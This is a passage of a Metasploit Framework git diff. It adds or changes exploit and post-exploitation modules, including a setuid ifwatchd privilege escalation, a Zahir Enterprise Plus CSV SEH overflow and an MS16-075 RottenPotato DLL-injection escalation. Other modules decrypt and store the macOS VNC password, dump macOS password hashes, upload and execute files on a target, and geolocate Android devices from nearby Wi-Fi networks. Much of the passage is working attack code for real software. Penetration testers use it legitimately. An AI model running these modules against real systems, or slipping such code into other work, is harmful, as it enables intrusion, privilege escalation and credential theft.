"#{ifwatchd_path} is setuid" + + CheckCode::Detected + end + + def exploit + unless check == CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}" + + print_status 'Writing interface arrival event script...' + cmd_exec "echo '#!/bin/sh' > #{script_path}" + cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}" + cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}" + exp = payload.encoded.gsub('"', '\"').gsub('$', '\$') + cmd_exec "echo \"#{exp}\" >> #{script_path}" + cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" + register_file_for_cleanup script_path + + cmd_exec "chmod +x '#{script_path}'" + + print_status "Executing #{ifwatchd_path}..." + interface = 'lo0' + cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo " + end +end diff --git a/modules/exploits/unix/fileformat/imagemagick_delegate.rb b/modules/exploits/unix/fileformat/imagemagick_delegate.rb index 735b899458..f1319594e6 100644 --- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb +++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb @@ -47,8 +47,7 @@ class MetasploitModule < Msf::Exploit %w{URL https://seclists.org/oss-sec/2016/q3/682}, %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab}, %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}, - %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}, - %w{AKA ImageTragick} + %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669} ], 'DisclosureDate' => 'May 3 2016', 'License' => MSF_LICENSE, @@ -63,7 +62,8 @@ class MetasploitModule < Msf::Exploit ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg ['PS file', template: 'msf.ps'] # PoC from taviso ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Notes' => {'AKA' => ['ImageTragick']} )) register_options([ diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 7aa30b2488..aa5dd2461a 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'], ['URL', 'https://github.com/a2u/CVE-2018-7600'], ['URL', 'https://github.com/nixawk/labs/issues/19'], - ['URL', 'https://github.com/FireFart/CVE-2018-7600'], + ['URL', 'https://github.com/FireFart/CVE-2018-7600'] ], 'DisclosureDate' => 'Mar 28 2018', 'License' => MSF_LICENSE, @@ -47,89 +47,83 @@ class MetasploitModule < Msf::Exploit::Remote # Automatic targets (PHP, cmd/unix, native) # ['Automatic (PHP In-Memory)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Type' => :php_memory + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Type' => :php_memory ], ['Automatic (PHP Dropper)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Type' => :php_dropper + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Type' => :php_dropper ], ['Automatic (Unix In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory ], ['Automatic (Linux Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper ], # # Drupal 7.x targets (PHP, cmd/unix, native) # ['Drupal 7.x (PHP In-Memory)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7'), - 'Type' => :php_memory + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('7'), + 'Type' => :php_memory ], ['Drupal 7.x (PHP Dropper)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7'), - 'Type' => :php_dropper + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('7'), + 'Type' => :php_dropper ], ['Drupal 7.x (Unix In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('7'), - 'Type' => :unix_memory + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Version' => Gem::Version.new('7'), + 'Type' => :unix_memory ], ['Drupal 7.x (Linux Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('7'), - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Version' => Gem::Version.new('7'), + 'Type' => :linux_dropper ], # # Drupal 8.x targets (PHP, cmd/unix, native) # ['Drupal 8.x (PHP In-Memory)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8'), - 'Type' => :php_memory + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('8'), + 'Type' => :php_memory ], ['Drupal 8.x (PHP Dropper)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8'), - 'Type' => :php_dropper + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('8'), + 'Type' => :php_dropper ], ['Drupal 8.x (Unix In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('8'), - 'Type' => :unix_memory + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Version' => Gem::Version.new('8'), + 'Type' => :unix_memory ], ['Drupal 8.x (Linux Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('8'), - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Version' => Gem::Version.new('8'), + 'Type' => :linux_dropper ] ], 'DefaultTarget' => 0, # Automatic (PHP In-Memory) 'DefaultOptions' => {'WfsDelay' => 2}, - 'Notes' => - { - 'AKA' => [ - 'SA-CORE-2018-002', - 'Drupalgeddon 2' - ] - } + 'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']} )) register_options([ diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index 8c1fc5d77b..d224fb99a1 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Rob Carr ' + 'rastating' ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 4d8e63dec4..bf1a0db7c4 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Rob Carr ' # Metasploit module + 'rastating' # Metasploit module ], 'DisclosureDate' => 'Feb 21 2015', 'Platform' => 'php', diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 036578cf18..339c6b1ce8 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -36,8 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Kacper Szurek', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Kacper Szurek', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 092da67136..68c49d27ab 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Alexander Borg', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Alexander Borg', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 940eb5569a..b4d322135b 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -26,8 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Kacper Szurek', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Kacper Szurek', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index 465ec6e5f6..13b1cca104 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Claudio Viviani', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Claudio Viviani', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 35b6b44347..5b1a7b3ddd 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote } ], - # For now, treat the IE6 target the same as teh debug target. + # For now, treat the IE6 target the same as the debug target. [ 'Internet Explorer 6', { 'Ret' => 0xc0c0c0c0, diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index bc24157d7b..ad494d7be5 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -70,6 +70,6 @@ class MetasploitModule < Msf::Exploit jump = Rex::Arch::X86.jmp_short(66) padding = rand_text(66) # Pad past buffer corruption - junk << seh << jump << padding << payload.encoded + junk + seh + jump + padding + payload.encoded end end diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb new file mode 100644 index 0000000000..9d10b0b75f --- /dev/null +++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb @@ -0,0 +1,66 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info={}) + super(update_info(info, + 'Name' => "Zahir Enterprise Plus 6 Stack Buffer Overflow", + 'Description' => %q{ + This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below. + The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters + via Import from other File. This results in overwriting a structured exception handler record. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'f3ci', # initial discovery + 'modpr0be' # poc and Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2018-17408' ], + [ 'EDB', '45505' ] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Zahir Enterprise Plus 6 <= build 10b', + { + #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) + 'Ret' => 0x52016661, + 'Offset' => 3041 + } + ] + ], + 'Payload' => + { + 'Space' => 5000, + 'BadChars' => "\x00\x0a\x0d\x22\x2c", + 'DisableNops' => true + }, + 'DisclosureDate' => 'Sep 28 2018', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv']) + ]) + end + + def exploit + buf = rand_text_alpha_upper(target['Offset']) + buf << "\r\n" # crash chars + buf << rand_text_alpha_upper(380) # extra chars to hit the offset + buf << generate_seh_record(target.ret) + buf << payload.encoded + + file_create(buf) + end +end diff --git a/modules/exploits/windows/local/alpc_taskscheduler.rb b/modules/exploits/windows/local/alpc_taskscheduler.rb index 1df4352d66..f5ad117494 100644 --- a/modules/exploits/windows/local/alpc_taskscheduler.rb +++ b/modules/exploits/windows/local/alpc_taskscheduler.rb @@ -52,6 +52,12 @@ class MetasploitModule < Msf::Exploit::Local ['CVE', '2018-8440'], ['URL', 'https://github.com/SandboxEscaper/randomrepo/'], ], + 'Notes' => + { + # Exploit overwrites PrintConfig.dll, which makes it unusable. + 'Stability' => [ OS_RESOURCE_LOSS ], + 'Reliability' => [ REPEATABLE_SESSION ] + }, 'DisclosureDate' => 'Aug 27 2018', 'DefaultTarget' => 0, )) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb new file mode 100644 index 0000000000..241016f004 --- /dev/null +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -0,0 +1,144 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/post/windows/reflective_dll_injection' + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::FileInfo + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', + 'Description' => %q( + Module utilizes the Net-NTLMv2 reflection between DCOM/RPC + to achieve a SYSTEM handle for elevation of privilege. Currently the module + does not spawn as SYSTEM, however once achieving a shell, one can easily + use incognito to impersonate the token. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'FoxGloveSec', # the original Potato exploit + 'breenmachine', # Rotten Potato NG! + 'Mumbai' # Austin : port of RottenPotato for reflection & quick module + ], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'DefaultOptions' => + { + 'EXITFUNC' => 'none', + 'WfsDelay' => '20' + }, + 'Targets' => + [ + ['Automatic', {}], + ['Windows x86', { 'Arch' => ARCH_X86 }], + ['Windows x64', { 'Arch' => ARCH_X64 }] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'References' => + [ + ['MSB', 'MS16-075'], + ['CVE', '2016-3225'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], + ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], + ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] + ], + 'DisclosureDate' => 'Jan 16 2016', + 'DefaultTarget' => 0 + })) + end + + def assign_target + if target.name == 'Automatic' + case sysinfo["Architecture"] + when 'x86' + vprint_status("Found we are on an x86 target") + my_target = targets[1] + when 'x64' + vprint_status("Found we are on an x64 target") + my_target = targets[2] + else + fail_with(Failure::NoTarget, "Unable to determine target") + end + else + my_target = target + end + return my_target + end + + def verify_arch(my_target) + if my_target["Arch"] != sysinfo["Architecture"] + print_error("Assigned Target Arch = #{my_target.opts['Arch']}") + print_error("Actual Target Arch = #{sysinfo['Architecture']}") + fail_with(Failure::BadConfig, "Assigned Arch does not match reality") + end + if client.arch != sysinfo["Architecture"] + fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported") + else + vprint_good("Current payload and target Arch match....") + end + end + + def check + privs = client.sys.config.getprivs + if privs.include?('SeImpersonatePrivilege') + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + my_target = assign_target + print_status("#{my_target['Arch']}") + verify_arch(my_target) + if check == Exploit::CheckCode::Safe + fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege') + end + if my_target.opts['Arch'] == 'x64' + dll_file_name = 'rottenpotato.x64.dll' + vprint_status("Assigning payload rottenpotato.x64.dll") + elsif my_target.opts['Arch'] == 'x86' + dll_file_name = 'rottenpotato.x86.dll' + vprint_status("Assigning payload rottenpotato.x86.dll") + else + fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code") + end + print_status('Launching notepad to host the exploit...') + notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) + begin + process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + rescue Rex::Post::Meterpreter::RequestError + print_error('Operation failed. Trying to elevate the current process...') + process = client.sys.process.open + end + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name) + library_path = ::File.expand_path(library_path) + print_status("Injecting exploit into #{process.pid}...") + exploit_mem, offset = inject_dll_into_process(process, library_path) + print_status("Exploit injected. Injecting payload into #{process.pid}...") + payload_mem = inject_into_process(process, payload.encoded) + # invoke the exploit, passing in the address of the payload that + # we want invoked on successful exploitation. + print_status('Payload injected. Executing exploit...') + process.thread.create(exploit_mem + offset, payload_mem) + print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') + end +end diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py index c4bd48cbb9..a008d88346 100755 --- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py +++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py @@ -94,7 +94,7 @@ metadata = { 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''} }, 'notes': { - 'AKA': ['ETERNALBLUE'] + 'AKA': ['ETERNALBLUE'] } } diff --git a/modules/post/android/sub_info.rb b/modules/post/android/gather/sub_info.rb similarity index 100% rename from modules/post/android/sub_info.rb rename to modules/post/android/gather/sub_info.rb diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index 4bd5862ece..2a7e8474ba 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post performing a lookup against Google APIs.}, 'License' => MSF_LICENSE, 'Author' => [ 'Tom Sellers '], - 'Platform' => %w{ osx win linux bsd solaris }, + 'Platform' => %w{ android osx win linux bsd solaris }, 'SessionTypes' => [ 'meterpreter', 'shell' ], )) @@ -102,12 +102,10 @@ class MetasploitModule < Msf::Post print_error("Error: #{e}") else print_status(g.to_s) - print_status("Google Maps URL: #{g.google_maps_url}") + print_status("Google Maps URL: #{g.google_maps_url}") end - end - # Run Method for when run command is issued def run case session.platform @@ -185,9 +183,31 @@ class MetasploitModule < Msf::Post print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE'] return end - + when 'android' + log = client.android.wlan_geolocate + listing = '' + wlan_list = [] + log.each do |x| + mac = x['bssid'] + ssid = x['ssid'] + ss = x['level'].to_s + listing += "BSSID: #{mac}\n" + listing += "SSID: #{ssid}\n" + listing += "Strength: #{ss}\n\n" + wlan_list << [mac, ssid, ss] + end + if listing.blank? + print_error("Unable to generate wireless listing.") + return nil + end + store_loot("host.android.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_good("Target's wireless networks:\n\n#{listing}\n") + if datastore['GEOLOCATE'] + perform_geolocation(wlan_list) + return + end else - print_error("The target's platform, #{platform}, is not supported at this time.") + print_error("The target's platform, #{session.platform}, is not supported at this time.") return nil end diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 5dedd2a8d2..277a305de9 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -5,56 +5,65 @@ class MetasploitModule < Msf::Post include Msf::Post::File + include Msf::Exploit::FileDropper - def initialize(info={}) - super( update_info( info, - 'Name' => 'Upload and Execute', - 'Description' => %q{ Push a file and execute it }, - 'License' => MSF_LICENSE, - 'Author' => [ 'egypt'], - 'Platform' => [ 'win','linux','osx' ], - 'SessionTypes' => [ 'meterpreter','shell' ] + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Upload and Execute', + 'Description' => %q{Push a file and execute it.}, + 'Author' => 'egypt', + 'License' => MSF_LICENSE, + 'Platform' => ['win', 'unix', 'linux', 'osx', 'bsd', 'solaris'], + 'SessionTypes' => ['meterpreter', 'shell'] )) - register_options( - [ - OptPath.new('LPATH', [true,'Local file path to upload and execute']), - OptString.new('RPATH', [false,'Remote file path on target (default is basename of LPATH)']), - ]) + register_options([ + OptPath.new('LPATH', [true, 'Local file path to upload and execute']), + OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), + OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), + OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 60]) + ]) end - def rpath - if datastore['RPATH'].blank? - remote_name = File.basename(datastore['LPATH']) + def run + print_status("Uploading #{lpath} to #{rpath}") + upload_file(rpath, lpath) + register_file_for_cleanup(rpath) + + if session.platform == 'windows' + # Don't use cmd.exe /c start so we can fetch output + cmd = rpath else - remote_name = datastore['RPATH'] + # Set 700 so only we can execute the file + chmod(rpath, 0700) + + # Handle absolute paths + cmd = rpath.start_with?('/') ? rpath : "./#{rpath}" end - remote_name + print_status("Executing command: #{cmd}") + output = cmd_exec(cmd, args, timeout) + + if output.blank? + print_status('Command returned no output') + else + print_line(output) + end end def lpath datastore['LPATH'] end - def run - upload_file(rpath, lpath) + def rpath + datastore['RPATH'].blank? ? File.basename(lpath) : datastore['RPATH'] + end - if session.platform.include?("windows") - cmd_exec("cmd.exe /c start #{rpath}", nil, 0) - else - cmd = "chmod 700 #{rpath} && " + def args + datastore['ARGS'] + end - # Handle absolute paths - if rpath.start_with?('/') - cmd << rpath - else - cmd << "./#{rpath}" - end - - cmd_exec(cmd, nil, 0) - end - - rm_f(rpath) + def timeout + datastore['TIMEOUT'] end end diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 694414c958..e4ef62c25a 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,10 +8,11 @@ require 'rexml/document' class MetasploitModule < Msf::Post # set of accounts to ignore while pilfering data - OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] + #OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] include Msf::Post::File include Msf::Post::OSX::Priv + include Msf::Post::OSX::System include Msf::Auxiliary::Report def initialize(info={}) @@ -44,7 +45,8 @@ class MetasploitModule < Msf::Post end # iterate over all users - users.each do |user| + get_nonsystem_accounts.each do |user_info| + user = user_info['name'] next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user print_status "Attempting to grab shadow for user #{user}..." if gt_lion? # 10.8+ @@ -201,13 +203,8 @@ class MetasploitModule < Msf::Post shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '') end - # @return [Array] list of user names - def users - @users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS - end - # @return [String] version string (e.g. 10.8.5) def ver_num - @version ||= cmd_exec("/usr/bin/sw_vers -productVersion").chomp + @product_version ||= get_sysinfo['ProductVersion'] end end diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb new file mode 100644 index 0000000000..cb4642dcb6 --- /dev/null +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -0,0 +1,69 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/auxiliary/report' + +class MetasploitModule < Msf::Post + include Msf::Post::OSX::Priv + include Msf::Post::File + + def initialize(info={}) + super( update_info( info, + 'Name' => 'OS X Display Apple VNC Password', + 'Description' => %q{ + This module shows Apple VNC Password from Mac OS X High Sierra. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Kevin Gonzalvo '], + 'Platform' => [ 'osx' ], + 'SessionTypes' => [ "meterpreter", "shell" ] + )) + + end + + def decrypt_hash(hash) + if hash == nil or hash.empty? + return nil + end + + aux = ["1734516E8BA8C5E2FF1C39567390ADCA"].pack('H*') + fixedkey = aux.unpack('C*') + + str_pw = ["#{hash}"].pack('H*') + array_pwd = str_pw.unpack('C*') + str = '' + + for data in fixedkey; + str += (data ^ array_pwd.shift).chr + end + return str.delete("\0") + end + + def run + unless is_root? + fail_with(Failure::NoAccess, "Root privileges are required to read VNC password file") + end + print_status("Checking VNC Password...") + vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt' + passwd_encrypt = read_file("#{vncsettings_path}") + final_passwd = decrypt_hash("#{passwd_encrypt}") + if !final_passwd.nil? + print_good("Password Found: #{final_passwd}") + pass_file = store_loot("osx.vnc.password", "text/plain", session, final_passwd, "passwd.pwd", "OSX VNC Password") + print_good("Password data stored as loot in: #{pass_file}") + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.fullname, + private_type: :password, + private_data: final_passwd.to_s, + workspace_id: myworkspace_id + } + create_credential(credential_data) + else + print_error("Password not found") + end + end +end diff --git a/msf-json-rpc.ru b/msf-json-rpc.ru new file mode 100644 index 0000000000..1bd93c2205 --- /dev/null +++ b/msf-json-rpc.ru @@ -0,0 +1,21 @@ +# msf-json-rpc.ru +# Start using thin: +# thin --rackup msf-json-rpc.ru --address localhost --port 8081 --environment development --tag msf-json-rpc start +# + +require 'pathname' +@framework_path = '.' +root = Pathname.new(@framework_path).expand_path +@framework_lib_path = root.join('lib') +$LOAD_PATH << @framework_lib_path unless $LOAD_PATH.include?(@framework_lib_path) + +require 'msfenv' + +if ENV['MSF_LOCAL_LIB'] + $LOAD_PATH << ENV['MSF_LOCAL_LIB'] unless $LOAD_PATH.include?(ENV['MSF_LOCAL_LIB']) +end + +# Note: setup Rails environment before calling require +require 'msf/core/web_services/json_rpc_app' + +run JsonRpcApp diff --git a/msfdb b/msfdb index 37ae360f95..1e31070e62 100755 --- a/msfdb +++ b/msfdb @@ -12,6 +12,17 @@ require 'sysrandom/securerandom' require 'uri' require 'yaml' +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) +$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + +require 'msf/util/helper' + + @script_name = File.basename(__FILE__) @framework = File.expand_path(File.dirname(__FILE__)) @@ -906,6 +917,27 @@ def invoke_command(commands, component, command) end end +def has_requirements + ret_val = true + postgresql_cmds = %w(psql pg_ctl initdb createdb) + other_cmds = %w(bundle thin) + missing_msg = 'Missing requirement: %s does not appear to be installed or is not in the environment path' + + unless postgresql_cmds.all? { |cmd| !Msf::Util::Helper.which(cmd).nil? } + puts missing_msg % { name: 'PostgreSQL' } + ret_val = false + end + + other_cmds.each do |cmd| + if Msf::Util::Helper.which(cmd).nil? + puts missing_msg % { name: "'#{cmd}'" } + ret_val = false + end + end + + ret_val +end + if $PROGRAM_NAME == __FILE__ @@ -915,6 +947,10 @@ if $PROGRAM_NAME == __FILE__ abort end + unless has_requirements + abort + end + # map component commands to methods commands = { database: { diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb index ef058b2fed..7ba6edf874 100644 --- a/spec/lib/msf/core/modules/loader/base_spec.rb +++ b/spec/lib/msf/core/modules/loader/base_spec.rb @@ -103,7 +103,7 @@ RSpec.describe Msf::Modules::Loader::Base do include_context 'Metasploit::Framework::Spec::Constants cleaner' let(:namespace_module_names) do - ['Msf', 'Modules', 'Mod617578696c696172792f72737065632f6d6f636b'] + ['Msf', 'Modules', 'Auxiliary__Rspec__Mock'] end let(:namespace_module) do @@ -291,7 +291,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod617578696c696172792f72737065632f6d6f636b' + 'Auxiliary__Rspec__Mock' end before(:example) do @@ -308,7 +308,7 @@ RSpec.describe Msf::Modules::Loader::Base do # create an namespace module that can be restored module Msf module Modules - module Mod617578696c696172792f72737065632f6d6f636b + module Auxiliary__Rspec__Mock class MetasploitModule < Msf::Auxiliary end @@ -316,7 +316,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @original_namespace_module = Msf::Modules::Mod617578696c696172792f72737065632f6d6f636b + 